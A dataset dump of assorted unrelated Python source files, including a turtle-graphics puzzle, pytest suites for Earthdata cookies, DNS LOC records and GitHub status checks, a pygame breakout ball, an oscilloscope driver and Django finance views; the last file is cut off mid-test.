id (stringlengths 1-7) | text (stringlengths 6-1.03M) | dataset_id (stringclasses 1 value) |
---|---|---|
3375638
|
"""Stage 5: Puzzle 4 of 10
Draw a triangle whose sides are all in different colors. Hint:
you'll have to figure out how far to turn by testing different
values for the `turn_right(degrees)` function. Note: we've added
`artist.random_color()` as well. Use it instead of a color to get
random colors. (`artist.random_colour()`, `artist.colour_random()`, and
`artist.color_random()` will also work.)
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level27')
a = artist
for count in range(3):
artist.color = artist.random_color()
a.move_forward(100)
a.turn_right(120)
# ???
artist.check()
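# Added note (not part of the original puzzle file): each pass through the loop picks
# a random pen color, draws one 100-unit side, and turns 120 degrees, the exterior
# angle of an equilateral triangle, so after three passes the triangle closes.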
|
StarcoderdataPython
|
1756809
|
import pytest
from datetime import datetime, timedelta
from modis_tools.auth import ModisSession, has_download_cookies
class TestModisSession:
def test_creates_session(self):
modis = ModisSession("test user", "test password")
assert modis.session
def test_no_credentials_raises_exception(self):
expected = Exception
with pytest.raises(expected):
modis = ModisSession()
class TestDownloadCookies:
@pytest.fixture()
def session_with_cookies(self):
modis = ModisSession("test user", "test password")
time = datetime.now() + timedelta(hours=9)
modis.session.cookies.set(
"urs_user_already_logged",
value="yes",
domain=".earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
modis.session.cookies.set(
"DATA", value="fake value,", domain="e4ftl01.cr.usgs.gov"
)
modis.session.cookies.set(
"_urs-gui_session",
value="fake value",
domain="urs.earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
return modis.session
def test_no_cookies_returns_false(self):
modis = ModisSession("test user", "test password")
expected = False
assert has_download_cookies(modis.session) == expected
def test_correct_cookies_return_true(self, session_with_cookies):
expected = True
assert has_download_cookies(session_with_cookies) == expected
def test_expired_first_cookie_return_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=-9)
session_with_cookies.cookies.set(
"urs_user_already_logged",
value="yes",
domain=".earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_expired_gui_cookie_return_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=-9)
session_with_cookies.cookies.set(
"_urs-gui_session",
value="fake value",
domain="urs.earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_incorrect_earthdata_domain_return_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=9)
session_with_cookies.cookies.set(
"urs_user_already_logged",
value="yes",
domain="wrong.url",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_logged_in_value_no_returns_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=9)
session_with_cookies.cookies.set(
"urs_user_already_logged",
value="no",
domain=".earthdata.nasa.gov",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_incorrect_data_domain_returns_false(self, session_with_cookies):
session_with_cookies.cookies.set(
"DATA", value="fake value,", domain="wrong.url"
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
def test_incorrect_gui_domain_returns_false(self, session_with_cookies):
time = datetime.now() + timedelta(hours=9)
session_with_cookies.cookies.set(
"_urs-gui_session",
value="fake value",
domain="wrong.url",
expires=datetime.timestamp(time),
)
expected = False
assert has_download_cookies(session_with_cookies) == expected
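# Summary added for illustration (the actual check lives in modis_tools.auth and is
# not shown here): taken together, the tests above imply that has_download_cookies()
# returns True only when the session holds an unexpired 'urs_user_already_logged'
# cookie with value 'yes' on .earthdata.nasa.gov, a 'DATA' cookie on
# e4ftl01.cr.usgs.gov, and an unexpired '_urs-gui_session' cookie on
# urs.earthdata.nasa.gov.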
|
StarcoderdataPython
|
4803105
|
__author__ = '<NAME>'
'''
https://codeforces.com/problemset/problem/688/B
Solution: The first 9 even-length palindromes are 11 to 99. The 10th is 1001, and the following ones
are obtained by putting 11, 22, ..., 99 between two 1s, giving 1111, 1221, 1331, ..., 1991, and so on.
This progression mirrors the natural numbers: the 5th such palindrome is 55, the 9th is 99, the 10th is
1001 and the 15th is 1551. Hence the n-th even-length palindrome is obtained by appending the reverse
of n to n.
Since we need to reverse n, it is convenient to keep the input as a string.
'''
def solve(n):
return n + ''.join(reversed(n))
if __name__ == "__main__":
n = raw_input()
print solve(n)
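# Added illustration (not part of the original submission): worked examples of the
# mapping described above, assuming solve() receives the index n as a string.
#   solve('5')  -> '55'     (5th even-length palindrome)
#   solve('10') -> '1001'   (10th)
#   solve('15') -> '1551'   (15th)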
|
StarcoderdataPython
|
52290
|
<gh_stars>1-10
"""
Python script to print all zendesk domain articles as a single entity. Useful for checking global
formatting properties of your articles.
N.B. this python app currently does not have a wrapper script.
"""
import sys
from zendesk.api import DomainConfiguration
from zendesk.api import HelpCenter
from zendesk.formatter import format_tags_local
def main(sub_domain):
config = DomainConfiguration(sub_domain)
hc = HelpCenter(config)
for category in hc.get_categories():
for section in category.get_sections():
for article in section.get_articles():
# XXX This could probably be improved to be prettier.
print('<a name="%i"></a><h2>%s</h2>' % (article.get_id(), article.get_name()))
print(format_tags_local(config, article.get_body()))
print('<p style="page-break-after:always;"></p>')
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: python %s <zendesk_sub_domain>' % sys.argv[0])
else:
main(sys.argv[1])
|
StarcoderdataPython
|
3363069
|
# Copyright (C) 2014 Red Hat, Inc.
# Author: <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED 'AS IS' AND RED HAT DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
try:
import unittest2 as unittest
except ImportError:
import unittest
import dns.rrset
import dns.rdtypes.ANY.LOC
class RdtypeAnyLocTestCase(unittest.TestCase):
def testEqual1(self):
'''Test default values for size, horizontal and vertical precision.'''
r1 = dns.rrset.from_text('foo', 300, 'IN', 'LOC',
'49 11 42.400 N 16 36 29.600 E 227.64m')
r2 = dns.rrset.from_text('FOO', 600, 'in', 'loc',
'49 11 42.400 N 16 36 29.600 E 227.64m '
'1.00m 10000.00m 10.00m')
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
def testEqual2(self):
'''Test default values for size, horizontal and vertical precision.'''
r1 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1),
22764.0) # centimeters
r2 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1),
22764.0, # centimeters
100.0, 1000000.00, 1000.0) # centimeters
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
def testEqual3(self):
'''Test size, horizontal and vertical precision parsers: 100 cm == 1 m.
Parsers in from_text() and __init__() have to produce equal results.'''
r1 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1), 22764.0,
200.0, 1000.00, 200.0) # centimeters
r2 = dns.rrset.from_text('FOO', 600, 'in', 'loc',
'49 11 42.400 N 16 36 29.600 E 227.64m '
'2.00m 10.00m 2.00m')[0]
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
def testEqual4(self):
'''Test size, horizontal and vertical precision parsers without unit.
Parsers in from_text() and __init__() have to produce equal results
for values with and without trailing "m".'''
r1 = dns.rdtypes.ANY.LOC.LOC(1, 29, (49, 11, 42, 400, 1),
(16, 36, 29, 600, 1), 22764.0,
200.0, 1000.00, 200.0) # centimeters
r2 = dns.rrset.from_text('FOO', 600, 'in', 'loc',
'49 11 42.400 N 16 36 29.600 E 227.64 '
'2 10 2')[0] # meters without explicit unit
self.failUnless(r1 == r2, '"%s" != "%s"' % (r1, r2))
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
168219
|
<reponame>gecco-evojax/evojax
# Copyright 2022 The EvoJAX Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC
from abc import abstractmethod
import jax.numpy as jnp
class PolicyNetwork(ABC):
"""Interface for all policy networks in EvoJAX."""
num_params: int
@abstractmethod
def get_actions(self,
vec_obs: jnp.ndarray,
params: jnp.ndarray) -> jnp.ndarray:
"""Get vectorized actions for the corresponding (obs, params) pair.
Args:
vec_obs - Vectorized observations of shape (num_envs, *obs_shape).
params - A batch of parameters, shape is (num_envs, param_size).
Returns:
jnp.ndarray. Vectorized actions.
"""
raise NotImplementedError()
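# A minimal illustrative subclass (added as a sketch; it is not part of EvoJAX): a
# stateless linear policy whose flat per-environment parameters are reshaped into an
# (obs_dim, act_dim) matrix and applied to the batched observations. The class name,
# dimensions and einsum layout below are assumptions made for this example.
class LinearPolicy(PolicyNetwork):
    def __init__(self, obs_dim: int, act_dim: int):
        self.obs_dim = obs_dim
        self.act_dim = act_dim
        self.num_params = obs_dim * act_dim

    def get_actions(self,
                    vec_obs: jnp.ndarray,
                    params: jnp.ndarray) -> jnp.ndarray:
        # vec_obs: (num_envs, obs_dim); params: (num_envs, obs_dim * act_dim)
        weights = params.reshape(-1, self.obs_dim, self.act_dim)
        # one matrix-vector product per environment -> (num_envs, act_dim)
        return jnp.einsum('ni,nio->no', vec_obs, weights)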
|
StarcoderdataPython
|
50730
|
# This file is part of comma, a generic and flexible library
# Copyright (c) 2011 The University of Sydney
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the University of Sydney nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE
# GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT
# HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
MAX_HELP_POSITION = 50
BASE_FORMATTER = argparse.RawTextHelpFormatter
class patched_formatter(BASE_FORMATTER):
def __init__(self, prog):
super(patched_formatter, self).__init__(prog, max_help_position=MAX_HELP_POSITION)
def _format_action_invocation(self, action):
if not action.option_strings or action.nargs == 0:
return super(patched_formatter, self)._format_action_invocation(action)
default = action.dest.upper()
args_string = self._format_args(action, default)
return ', '.join(action.option_strings) + ' ' + args_string
def _format_action(self, action):
return ''.join([' '*4,
self._format_action_invocation(action),
': ',
self._expand_help(action),
'\n'])
def can_be_patched(base_formatter):
try:
getattr(base_formatter, '_format_action_invocation')
getattr(base_formatter, '_format_args')
getattr(base_formatter, '_format_action')
getattr(base_formatter, '_expand_help')
return True
except AttributeError:
return False
def argparse_fmt(prog):
"""
use this function as the formatter_class in argparse.ArgumentParser
"""
if can_be_patched(BASE_FORMATTER):
return patched_formatter(prog)
else:
return BASE_FORMATTER(prog, max_help_position=MAX_HELP_POSITION)
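# Hedged usage sketch (added; the argument names below are made up for illustration):
# pass argparse_fmt as the formatter_class so the patched help layout is used.
def _demo():
    parser = argparse.ArgumentParser(description='demo', formatter_class=argparse_fmt)
    parser.add_argument('--fields', '-f', help='fields to output')
    parser.add_argument('--verbose', '-v', action='store_true', help='more output')
    parser.print_help()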
|
StarcoderdataPython
|
3215001
|
import pygame, math
from engine import Engine
from eventManager import Events, EventManager
from brick import *
from paddle import *
class Ball(Engine.GUI.Widget):
def __init__(self, level):
super().__init__()
self.level = level
self.eventManager = EventManager()
self.radius = self.options.ballRadius
self.vector = self.options.ballVectorInitial
self.gyreDirection = self.options.ballGyreDirection
self.speed = self.options.ballSpeed
self.color = self.options.ballColor
self.pauseForTicks = 0
self.repositionWhilePausedAfterTicks = 0
# putting these here as they may be needed
self.width = self.options.ballRadius * 2
self.height = self.width
self.x = self.options.ballInitialPosition[0]
self.y = self.options.ballInitialPosition[1]
# making a square ball for now
self.image = pygame.Surface((self.options.ballRadius * 2, self.options.ballRadius * 2))
self.image.fill(self.color)
self.rect = self.image.get_rect()
self.rect.x = self.options.ballInitialPosition[0] - self.radius
self.rect.y = self.options.ballInitialPosition[1] - self.radius
self.group = pygame.sprite.GroupSingle()
self.group.add(self)
self.soundBallBounce = pygame.mixer.Sound(self.options.soundBallBounce)
self.soundVolumeBallBounce = self.options.soundVolumeBallBounce
def update(self):
x = self.rect.x
y = self.rect.y
self.width = self.options.ballRadius * 2
self.height = self.width
self.image = pygame.Surface((self.options.ballRadius * 2, self.options.ballRadius * 2))
self.image.fill(self.color)
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
def addListeners(self,):
event = Events.TickEvent()
self.eventManager.addListener(event, self)
def notify(self, event):
if isinstance(event, Events.TickEvent):
if self.pauseForTicks > 0:
self.pauseForTicks -= 1
if self.pauseForTicks == self.repositionWhilePausedAfterTicks:
self.move(0)
else:
# reposition ball and check for collisions
self.move(self.speed)
self.checkForCollisions()
def handleOverlap(self, xOverlap, yOverlap, isPaddle):
# figure out which overlap is further into the brick, with an edge case where they are equal
overlap = 0
normalAxis = 180 # default to top/bottom collisions
if not isPaddle:
# sanity check for overlap as it should never be greater than the speed of the ball
# this is invalid for paddle collisions as the paddle moves independently of the ball at its own rate
if xOverlap > self.speed:
xOverlap = 0 # ignore overlap
if yOverlap > self.speed:
yOverlap = 0 # ignore overlap
else:
xOverlap = 0 # it's the paddle, so we only care about the yOverlap if it exists
if yOverlap > xOverlap: # collision likely came from top/bottom
overlap = yOverlap
elif xOverlap > yOverlap: # collisions likely came from left/right
overlap = xOverlap
normalAxis = 360 # change normal axis to vertical
else: # edge case of equal, so which one doesn't matter
overlap = xOverlap
self.move(overlap * -1, assureMovement = True) # move ball back along vector to the last edge passed
return normalAxis
def bounce(self, bounces, normalAxis, collidableObjects, isPaddle = False, spin = None):
# recheck position and move ball outside of (or to the edge of) the collision zone to prevent multiple bounces on the same object per hit
# otherwise vectors can get messed up as the ball bounces off the object going into it and then again (and again and again, etc.)
# while exiting the collision zone
normals = []
# play sound
if self.options.soundPlayBallBounce:
self.soundBallBounce.play()
if self.leftEdge() < self.options.levelZoneGamePlay["x"]:
self.x = self.options.levelZoneGamePlay["x"] # left edge is past window, clamp to left edge of window
if self.rightEdge() > self.options.levelZoneGamePlay["x"] + self.options.levelZoneGamePlay["width"]:
self.x = (self.options.levelZoneGamePlay["x"] + self.options.levelZoneGamePlay["width"]) - self.rect.width # right edge is past window, clamp to right edge of window
if self.topEdge() < self.options.levelZoneGamePlay["y"]:
self.y = self.options.levelZoneGamePlay["y"] # top edge is past window, clamp to top edge of window
if self.bottomEdge() > self.options.levelZoneGamePlay["y"] + self.options.levelZoneGamePlay["height"]:
self.y = (self.options.levelZoneGamePlay["y"] + self.options.levelZoneGamePlay["height"]) - self.rect.height # bottom edge is past window, clamp to bottom edge of window
# now do the same for the bricks and the paddle (both of which are collidable objects)
for co in collidableObjects:
if co.rect.collidepoint(self.rect.topleft):
# topleft is within the collidable object
xOverlap = abs(co.rightEdge() - self.leftEdge())
yOverlap = abs(co.bottomEdge() - self.topEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
if co.rect.collidepoint(self.rect.topright):
# topright is within the collidable object
xOverlap = abs(co.leftEdge() - self.rightEdge())
yOverlap = abs(co.bottomEdge() - self.topEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
if co.rect.collidepoint(self.rect.bottomright):
# bottomright is within the collidable object
xOverlap = abs(co.leftEdge() - self.rightEdge())
yOverlap = abs(co.topEdge() - self.bottomEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
if co.rect.collidepoint(self.rect.bottomleft):
# bottomleft is within the collidable object
xOverlap = abs(co.rightEdge() - self.leftEdge())
yOverlap = abs(co.topEdge() - self.bottomEdge())
normals.append(self.handleOverlap(xOverlap, yOverlap, isPaddle))
co.collide() # may as well notify the object of a collision here so we don't have to loop through twice
# finally, change vector, angle of incidence = angle of reflection, may need to change rotation (counter/clockwise) on paddle hit or ball spin
if len(normals) > 0: # multiple bounces passed in, bounce once prioritizing vertical travel
normalAxis = max(normals)
# angle of incidence... yadda yadda...
reflectionVector = (normalAxis - self.vector)
# change gyre direction if needed
reflectionVector -= self.gyreDirection #(0 or 180)
# keep the angles sane (i.e., between 0 and 359)
reflectionVector %= 360
# update to new vector
self.vector = reflectionVector
def checkForCollisions(self):
# initialize variables here to count brick/paddle bounces, as Python does not support variable hoisting
bounces = 0
collidableObjects = pygame.sprite.Group()
# check for boundary collisions
if self.topEdge() <= self.options.levelZoneGamePlay["y"]:
self.bounce(1, 180, collidableObjects)
if self.rightEdge() >= self.options.levelZoneGamePlay["x"] + self.options.levelZoneGamePlay["width"]:
self.bounce(1, 360, collidableObjects)
if self.bottomEdge() >= self.options.levelZoneGamePlay["y"] + self.options.levelZoneGamePlay["height"]: # bottom was hit, lose a ball
# reset to intial position and vector
self.x = self.options.ballInitialPosition[0]
self.y = self.options.ballInitialPosition[1]
self.vector = self.options.ballVectorInitial
self.pauseForTicks = 60
event = Events.StatUpdateEvent(stat = Engine.Stats.BALLS_REMAINING, value = -1)
self.eventManager.post(event)
if self.leftEdge() <= self.options.levelZoneGamePlay["x"]:
self.bounce(1, 360, collidableObjects)
#check for bricks
collidableObjects.add(self.level.getWidgets(Brick))
collidableObjects = pygame.sprite.groupcollide(collidableObjects, self.group, False, False) #redefine collidableObjects to include only those Bricks that were collided with
bounces += len(collidableObjects)
if bounces > 0:
self.bounce(bounces, 180, collidableObjects)
# redefine as a new group to remove all sprites from this group and make it an actual Group, since groupcollide returns a dict
collidableObjects = pygame.sprite.Group()
# reset bounces
bounces = 0
# check for paddle
collidableObjects.add(self.level.getWidgets(Paddle))
collidableObjects = pygame.sprite.groupcollide(collidableObjects, self.group, False, False) #redefine collidableObjects to include only those Paddles that were collided with
bounces += len(collidableObjects)
if bounces > 0:
for paddle in collidableObjects: # should only be one, but this allows for multiple paddles later if we want to do that sort of thing
self.bottomEdge(paddle.topEdge()) # always set the bottom edge of the ball to the top edge of the paddle
paddle.redirect(self) # set the new vector
if self.options.soundPlayBallBounce:
self.soundBallBounce.play() # and play sound
def move(self, distance, assureMovement = None):
if assureMovement == None:
assureMovement = self.options.difficulty == 0
vector = math.radians(self.vector)
dx = distance * math.cos(vector)
dy = distance * math.sin(vector)
if assureMovement:
if 0 < abs(dx) < 1:
sign = dx / abs(dx)
dx = 1 * sign
if 0 < abs(dy) < 1:
sign = dy / abs(dy)
dy = 1 * sign
# this will keep track of x,y separately and account for fractional pixel movement
self.x += dx
self.y += dy
# assigning a fractional value to a pygame.Rect will apparently truncate the fraction, hence the need for separate storage above
self.rect.x = self.x
self.rect.y = self.y
|
StarcoderdataPython
|
4811953
|
<reponame>kynan/lightlab<gh_stars>1-10
from . import VISAInstrumentDriver
from lightlab.equipment.abstract_drivers import TekScopeAbstract
from lightlab.laboratory.instruments import Oscilloscope
class Tektronix_TDS6154C_Oscope(VISAInstrumentDriver, TekScopeAbstract):
''' Real time scope.
See abstract driver for description.
`Manual <http://www.tek.com/sites/tek.com/files/media/media/resources/55W_14873_9.pdf>`__
Usage: :any:`/ipynbs/Hardware/Oscilloscope.ipynb`
'''
instrument_category = Oscilloscope
totalChans = 4
# Similar to the DSA, except
_recLenParam = 'HORIZONTAL:RECORDLENGTH' # this is different from DSA
_clearBeforeAcquire = True
_measurementSourceParam = 'SOURCE1:WFM'
_runModeParam = 'ACQUIRE:STOPAFTER:MODE'
_runModeSingleShot = 'CONDITION'
_yScaleParam = 'YMULT' # this is different from DSA
def __init__(self, name='The TDS scope', address=None, **kwargs):
VISAInstrumentDriver.__init__(self, name=name, address=address, **kwargs)
TekScopeAbstract.__init__(self)
def __setupSingleShot(self, isSampling, forcing=False):
''' Additional DSA things needed to put it in the right mode.
If it is not sampling, the trigger source should always be external
'''
super()._setupSingleShot(isSampling, forcing)
self.setConfigParam('ACQUIRE:STOPAFTER:CONDITION',
'ACQWFMS' if isSampling else 'AVGCOMP',
forceHardware=forcing)
if isSampling:
self.setConfigParam('ACQUIRE:STOPAFTER:COUNT', '1', forceHardware=forcing)
if not isSampling:
self.setConfigParam('TRIGGER:SOURCE', 'EXTDIRECT', forceHardware=forcing)
|
StarcoderdataPython
|
1739539
|
<filename>{{cookiecutter.project_directory}}/{{cookiecutter.main_package_name}}/config.py<gh_stars>1-10
"""Application configuration."""
import logging
import os
class Config(object):
"""Base configuration."""
SECRET_KEY = os.environ.get('{{cookiecutter.main_package_name | upper}}_SECRET', 'default-secret-key')
class DevelopmentConfig(Config):
"""Development configuration."""
ENV = 'development'
DEBUG = True
LOG_LEVEL = logging.DEBUG
class TestingConfig(Config):
"""Test configuration."""
ENV = 'testing'
DEBUG = True
TESTING = True
LOG_LEVEL = logging.DEBUG
class ProductionConfig(Config):
"""Production configuration."""
ENV = 'production'
DEBUG = False
TESTING = False
URL_PREFIX = os.environ.get('{{ cookiecutter.main_package_name | upper}}_URL_PREFIX',
'/{{ cookiecutter.main_package_name | lower }}')
LOG_LEVEL = logging.WARNING
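# Hedged usage sketch (added; it assumes the package is consumed by a Flask-style app,
# which this template does not show): a configuration class is typically selected by
# environment name and loaded with app.config.from_object(), e.g.
#
#     config_map = {'development': DevelopmentConfig,
#                   'testing': TestingConfig,
#                   'production': ProductionConfig}
#     app.config.from_object(config_map[os.environ.get('FLASK_ENV', 'production')])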
|
StarcoderdataPython
|
24065
|
<reponame>su226/IdhagnBot
from typing import Any
from .. import util
FORMAT = '''\
🤔 {username} posted... something
https://t.bilibili.com/{id}
The bot can't understand this yet qwq'''
def handle(content: Any) -> str:
return FORMAT.format(
username=content["desc"]["user_profile"]["info"]["uname"],
id=content["desc"]["dynamic_id_str"])
|
StarcoderdataPython
|
3275654
|
import sys
sys.path.append( '..' )
from PyRTF import *
def MergedCells( ) :
# another test for the merging of cells in a document
doc = Document()
section = Section()
doc.Sections.append( section )
# create the table that will get used for all of the "bordered" content
col1 = 1000
col2 = 1000
col3 = 1000
col4 = 2000
section.append( 'Table One' )
table = Table( col1, col2, col3 )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two' ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', span=2 ) )
table.AddRow( Cell( 'A-one', span=3 ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two' ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one', span=2 ), Cell( 'A-two' ) )
section.append( table )
section.append( 'Table Two' )
table = Table( col1, col2, col3 )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', start_vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( Paragraph( ParagraphPropertySet( alignment=ParagraphPropertySet.CENTER ), 'SPREAD' ),
span=3 ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( 'A-two', start_vertical_merge=True ), Cell( 'A-three' ) )
table.AddRow( Cell( 'A-one' ), Cell( vertical_merge=True ), Cell( 'A-three' ) )
section.append( table )
#
section.append( 'Table Three' )
table = Table( col1, col2, col3, col4 )
table.AddRow( Cell( 'This is pretty amazing', flow=Cell.FLOW_LR_BT, start_vertical_merge=True ),
Cell( 'one' ), Cell( 'two' ), Cell( 'three' ) )
for i in range( 10 ) :
table.AddRow( Cell( vertical_merge=True ),
Cell( 'one' ), Cell( 'two' ), Cell( 'three' ) )
section.append( table )
section.append( 'Table Four' )
table = Table( col4, col1, col2, col3 )
table.AddRow( Cell( 'one' ), Cell( 'two' ), Cell( 'three' ),
Cell( 'This is pretty amazing', flow=Cell.FLOW_RL_TB, start_vertical_merge=True ) )
for i in range( 10 ) :
table.AddRow( Cell( 'one' ), Cell( 'two' ), Cell( 'three' ),
Cell( vertical_merge=True ))
section.append( table )
return doc
if __name__ == '__main__' :
renderer = Renderer()
renderer.Write( MergedCells(), file( 'MergedCells.rtf', 'w' ) )
print "Finished"
|
StarcoderdataPython
|
3362558
|
from django.contrib import messages
from django.utils.safestring import mark_safe
from django.shortcuts import HttpResponseRedirect
from django.core.urlresolvers import reverse
from smartmin.views import SmartCRUDL, SmartCreateView, SmartListView
from .models import Transaction, Category
class CategoryCRUDL(SmartCRUDL):
model = Category
class Create(SmartCreateView):
def get_success_url(self):
animal_id = self.request.session.get('animal_id', None)
return reverse('finances.transaction_create') + '?animal=' + animal_id
class TransactionCRUDL(SmartCRUDL):
model = Transaction
class FormMixin(object):
def __init__(self, **kwargs):
from .forms import TransactionForm
self.form_class = TransactionForm
super(TransactionCRUDL.FormMixin, self).__init__(**kwargs)
class Create(FormMixin, SmartCreateView):
fields = ('transaction_type', 'category', 'date', 'amount', )
field_config = {
'transaction_type': (dict(label='Type')),
'category': dict(help=mark_safe('<a href="/finances/category/create/">Click here</a> to add new category')),
}
def get(self, request, *args, **kwargs):
animal_id = request.GET.get('animal', None)
group_id = request.GET.get('group', None)
request.session['animal_id'] = animal_id
if not animal_id and not group_id:
messages.warning(request, 'Animal Id or group Id is required')
return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
return super(TransactionCRUDL.Create, self).get(request, *args, **kwargs)
def get_success_url(self):
return reverse('animals.animal_read', args=[self.request.GET.get('animal', None)])
class List(SmartListView):
fields = ('id', 'date', 'transaction_type', 'category', 'amount', )
field_config = {
'transaction_type': (dict(label='Type')),
}
def get_queryset(self, **kwargs):
queryset = super(TransactionCRUDL.List, self).get_queryset(**kwargs)
queryset = queryset.order_by('-id')
return queryset
|
StarcoderdataPython
|
3387096
|
import json
import requests
import unittest
from unittest import mock
from sphinx_action import status_check
class TestStatusChecks(unittest.TestCase):
@mock.patch('sphinx_action.status_check.requests.post')
def test_create_check(self, mock_post):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_response.json = mock.Mock(return_value=create_response)
mock_post.return_value = mock_response
id = status_check.create_in_progress_status_check(
'SecretToken', 'sha_hash', 'ammaraskar/sphinx-action'
)
self.assertEqual(id, 4)
mock_post.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs',
headers={
'Authorization': 'Bearer SecretToken',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'name': 'Sphinx Check',
'head_sha': 'sha_hash',
'status': 'in_progress',
'started_at': mock.ANY
}
)
@mock.patch('sphinx_action.status_check.requests.patch')
def test_finish_status_check_in_progress(self, mock_patch):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_patch.return_value = mock_response
check_output = status_check.CheckOutput(
title='Test Check', summary='Test In Progress', annotations=[]
)
status_check.update_status_check(
id=23, github_token='<PASSWORD>',
repo='ammaraskar/sphinx-action', check_output=check_output
)
mock_patch.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs/23', # noqa
headers={
'Authorization': 'Bearer Secret<PASSWORD>',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'output': {
'title': 'Test Check',
'summary': 'Test In Progress',
'annotations': []
}
}
)
@mock.patch('sphinx_action.status_check.requests.patch')
def test_finish_status_check_success(self, mock_patch):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_patch.return_value = mock_response
check_output = status_check.CheckOutput(
